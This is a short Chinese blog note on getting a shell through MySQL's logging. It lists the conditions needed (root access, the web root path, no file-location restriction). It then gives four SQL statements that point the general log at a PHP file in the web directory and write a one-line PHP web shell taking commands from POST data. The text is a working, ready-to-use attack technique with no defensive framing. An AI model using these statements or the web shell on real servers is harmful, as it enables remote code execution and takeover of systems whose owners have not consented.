[笔记]Mysql通过日志拿shell

Mysql通过日志拿shell

emmm~有点舒服

0x00 利用条件

  1. root

  2. 网站物理路径

  3. 文件位置未被限制


0x01 SQL语句

set global general_log = on;
set global general_log_file = 'C:/phpStudy/WWW/dyboy.php';
select '<?php @assert($_POST["dyboy"]); ?>';
set global general_log = off;
发表评论 / Comment

用心评论~